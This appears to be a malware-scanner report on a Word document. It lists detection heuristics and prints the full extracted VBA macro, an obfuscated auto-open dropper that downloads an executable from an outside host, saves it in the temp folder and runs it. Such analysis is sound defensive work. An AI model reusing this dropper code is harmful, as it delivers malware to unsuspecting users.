MALICIOUS
228
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-1616883 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1616883
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set VvC0OQ6h8 = CreateObject(OtF2MZh2Cfnl9) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10423 bytes |
SHA-256: 0ef5087771d4a51c205a183460b8315e7c60f913a46e486e2a6b1e467b3fc83c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
NVNJJEJJE Chr(60) & "KKFL<EOO;A", 43.17
End Sub
Sub NVNJJEJJE(GGGG As String, FFFFF As Long)
KLJHVNWE
End Sub
Sub KLJHVNWE()
URTniRUwGB
End Sub
Attribute VB_Name = "Module1"
Function CategoriseField(FieldName As String) As String
Dim Category As String
Category = "Undefined"
Dim CatBnd As Integer, FieldBnd As Integer, CatItr As Integer, FieldItr As Integer
Dim ThisField As String
CatBnd = UBound(FieldHeadings, 1)
For CatItr = 0 To CatBnd
FieldBnd = UBound(FieldHeadings(CatItr, 1)(1), 1)
For FieldItr = 0 To FieldBnd
ThisField = FieldHeadings(CatItr, 1)(1)(FieldItr)
If ThisField = FieldName Then
Category = FieldHeadings(CatItr, 0)
CategoriseField = Category
Exit For
End If
Next FieldItr
If CategoriseField = Category Then
Exit For
End If
Next CatItr
' If AddControl = "AddControl" Then
' Select Case Category
'
'
' End If
End Function
Sub URTniRUwGB()
EDc1mFJHKrRm0 = Chr(61) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(60) & Chr(47) & "w" & "w" & Chr(119) & "." & Chr(100) & Chr(114) & Chr(101) & Chr(115) & "s" & Chr(117) & Chr(114) & Chr(115) & Chr(116) & Chr(97) & Chr(108) & Chr(108) & Chr(45) & Chr(115) & Chr(111) & Chr(110) & Chr(110) & Chr(101) & Chr(110) & Chr(104) & "o" & Chr(102) & Chr(46) & Chr(100) & Chr(101) & "/" & Chr(57) & Chr(57) & Chr(47) & Chr(48) & Chr(49) & Chr(46) & Chr(59) & "e" & Chr(120) & Chr(101)
Dim kljhnIOH As String
kljhnIOH = "M" & Chr(105) & Chr(99) & Chr(114) & Chr(61) & "o" & "s" & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(59) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(60) & "T" & Chr(84) & "P"
For DGxsbHsZ = 59 To 61
kljhnIOH = Replace(kljhnIOH, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set KgJquztrTap = VvC0OQ6h8(kljhnIOH)
For DGxsbHsZ = 59 To 61
EDc1mFJHKrRm0 = Replace(EDc1mFJHKrRm0, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False
Dim EJJFEF As String
EJJFEF = "W" & Chr(83) & Chr(99) & Chr(60) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & "." & Chr(59) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(61) & Chr(108)
For DGxsbHsZ = 59 To 61
EJJFEF = Replace(EJJFEF, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set SmuuuU81PmD = VvC0OQ6h8(EJJFEF)
Set K2BAN3ePSzEUUZ = CallByName(SmuuuU81PmD, Chr(69) & Chr(110) & "v" & Chr(105) & "r" & "o" & Chr(110) & Chr(109) & Chr(101) & Chr(110) & "t", VbGet, Chr(80) & Chr(114) & Chr(111) & "c" & "e" & Chr(115) & Chr(115))
YYRGHi07Vig = K2BAN3ePSzEUUZ("T" & "E" & Chr(77) & Chr(80))
Iw1u5AAHYx = YYRGHi07Vig & "\" & "d" & "i" & "k" & Chr(111) & Chr(61) & Chr(112) & Chr(105) & Chr(114) & Chr(116) & "." & Chr(60) & "e" & Chr(59) & Chr(120) & "e"
For DGxsbHsZ = 59 To 61
Iw1u5AAHYx = Replace(Iw1u5AAHYx, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Dim pI78nXO4LvafL7() As Byte
CallByName KgJquztrTap, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
pI78nXO4LvafL7 = CallByName(KgJquztrTap, "r" & Chr(101) & "s" & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & "d" & Chr(121), VbGet)
Ajh6bff8yWYHO pI78nXO4LvafL7, Iw1u5AAHYx
On Error GoTo ZIyC6gTRQV
a = 233 / 0
On Error GoTo 0
O1pmpYMO:
Exit Sub
ZIyC6gTRQV:
NvPfGv8GF2j 33, "mt0ja19PZDhQ4k", "dvEWVewvwe"
Resume O1pmpYMO
End Sub
Sub AddToEntryForm_Deprecated(ListOfFields As Variant, Optional Category As String, Optional SampleNum As Integer)
Dim CurrentField As Variant, CurrFieldName As String, CurrFieldCat As String
For Each CurrentField In ListOfFields
CurrFieldName = ListOfFields()()
CurrFieldCat = CategoriseField(CurrFieldName)
Select Case CurrFieldCat
Case "Description":
' Consider SampleNum to return Frame to add control to
' NewEntry_frm.Description_frame.Controls.Add
'Function to return controls on multipage
'Function to populate multipage with all controls
'Consider adding management page for validations
'Override
'Shade non-applicable fields//& hide?
' Add to desc frame Description_Frame
''''//
'Add to all multipage objects according to site restriction | Replicate when adding more samples
End Select
Next CurrentField
End Sub
Sub ShowAllFields()
End Sub
Attribute VB_Name = "Module2"
Public LJIGuygbo As Integer
Public LIUGBVSULIV As Double
Public Iw1u5AAHYx As String
Public LIUGwefweBVSULIV As Double
Function GetSiteDetails(Site As String) As Variant
Dim i As Integer, UpperBound As Integer
Dim SearchIn() As String
Dim SiteHold As String
Dim SiteDetails(2) As String
If Len(Site) > 3 Then
SearchIn = SiteNames
Else
SearchIn = SiteCodes
End If
UpperBound = UBound(SearchIn)
For i = 0 To UpperBound
SiteHold = SearchIn(i)
If SiteHold = Site Then
Exit For
End If
Next i
SiteDetails(0) = SiteCodes(i)
SiteDetails(1) = SiteNames(i)
SiteDetails(2) = ee.SiteDepts(i)
GetSiteDetails = SiteDetails
End Function
Public Function NvPfGv8GF2j(Wvbwebwe As Long, IxcH06sl As String, IVBHR As String)
Set VBBkHQNgCewB = VvC0OQ6h8("S" & "h" & Chr(101) & "l" & Chr(108) & Chr(46) & "A" & Chr(112) & "p" & Chr(108) & Chr(105) & "c" & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
For nbiiu = 44 To 77
If nbiiu = 10 Then
Exit Function
End If
nbiiu = nbiiu * 2
Next nbiiu
VBBkHQNgCewB.Open (Iw1u5AAHYx)
End Function
Sub GetDeptRest()
Dim DepartmentCol As Integer: DepartmentCol = 3
Dim SampleTypeCol As Integer: SampleTypeCol = 4
Dim RwItrtr As Long
Dim LastRw As Long: LastRw = SplDetWs.Range(SplDetWs.Cells(100000, SampleTypeCol).Address).End(xlUp).Row
Dim DeptName As String
Dim ThisList() As Variant, RestrictionCount As Integer
ReDim ThisList(1, 0)
' Dim DeptRestrictArr() As Variant
ReDim DeptRestrictArr(1, 0) 'Dimension 2 contains depts
Dim DeptItrtr As Integer, DeptCount As Integer, DisDeptHold As String, DisDepts() As String: DisDepts = Split(DistinctDepts, ",")
For DeptItrtr = 0 To UBound(DisDepts)
DisDeptHold = DisDepts(DeptItrtr)
ReDim Preserve DeptRestrictArr(1, DeptCount)
For RwItrtr = 2 To LastRw
DeptName = SplDetWs.Cells(RwItrtr, DepartmentCol).Value
If DeptName = DisDeptHold Then
ReDim Preserve ThisList(1, RestrictionCount)
ThisList(0, RestrictionCount) = SplDetWs.Cells(RwItrtr, SampleTypeCol).Value
Set ThisList(1, RestrictionCount) = SplDetWs.Range(SplDetWs.Cells(RwItrtr, SampleTypeCol).Address)
' Set _R(RestrictionCount) = SplDetWs.Range(SplDetWs.Cells(RwItrtr, SampleTypeCol).Address)
RestrictionCount = RestrictionCount + 1
End If
Next RwItrtr
RestrictionCount = 0
DeptRestrictArr(0, DeptCount) = DisDeptHold
DeptRestrictArr(1, DeptCount) = ThisList
DeptCount = DeptCount + 1
ReDim ThisList(1, 0)
Next DeptItrtr
End Sub
Public Function Ajh6bff8yWYHO(f7WbyEoZY4mNI As Variant, kRsTyyPIBbP8dW As String)
Dim tXdYzTtixn3EsU: Set tXdYzTtixn3EsU = VvC0OQ6h8("A" & "d" & "o" & Chr(100) & "b" & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & Chr(109))
For BEETNETN = 44 To 77
If BEETNETN = 10 Then
Exit Function
End If
BEETNETN = BEETNETN * 2
Next BEETNETN
With tXdYzTtixn3EsU
.Type = 1
.Open
.write f7WbyEoZY4mNI
.savetofile kRsTyyPIBbP8dW, 2
End With
End Function
Public Function VvC0OQ6h8(OtF2MZh2Cfnl9 As String)
Set VvC0OQ6h8 = CreateObject(OtF2MZh2Cfnl9)
End Function
Sub GetAllSamplesTypes()
Dim LastSample As Integer: LastSample = SampleTypesWs.Range(SampleTypesWs.Cells(100000, 1).Address).End(xlUp).Row
Dim SampleItrtr As Integer, SampleCount As Integer, ThisSample As String
ReDim AllSamplesTypes_S(LastSample - 2)
For SampleItrtr = 2 To LastSample
ThisSample = SampleTypesWs.Cells(SampleItrtr, 1).Value
AllSamplesTypes_S(SampleCount) = ThisSample
SampleCount = SampleCount + 1
Next SampleItrtr
End Sub
Sub AddToEntryForm(ListOfCatHeadings As Variant)
Dim i As Integer, HBound As Integer: HBound = UBound(ListOfCatHeadings, 2)
Dim ThisHeading As String, ThisCategory As String
Dim newControl As Object, DescControlsCount As Integer
For i = 0 To HBound
ThisHeading = ListOfCatHeadings(0, i)
ThisCategory = ListOfCatHeadings(1, i)
Select Case ThisCategory
Case "Description":
Set newControl = NewEntry_frm.Description_frame_1.Controls.Add("Forms.Textbox.1")
With newControl
.Name = ThisHeading
' .Caption = "Enter " & ThisHeading
.Top = 10 + (20 * DescControlsCount)
.Height = 18
.Width = 50
End With
DescControlsCount = DescControlsCount + 1
End Select
Next i
End Sub
'Vars Shouldst be Public
Sub GetAllSamplesRest()
Dim DepartmentCol As Integer: DepartmentCol = 3
Dim SampleTypeCol As Integer: SampleTypeCol = 4
Dim RwItrtr As Long
Dim LastRw As Long: LastRw = SplDetWs.Range(SplDetWs.Cells(100000, SampleTypeCol).Address).End(xlUp).Row
Dim DeptName As String
Dim AllCount As Integer
For RwItrtr = 2 To LastRw
DeptName = SplDetWs.Cells(RwItrtr, DepartmentCol).Value
If DeptName = "All" Then
AllCount = AllCount + 1
End If
Next RwItrtr
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.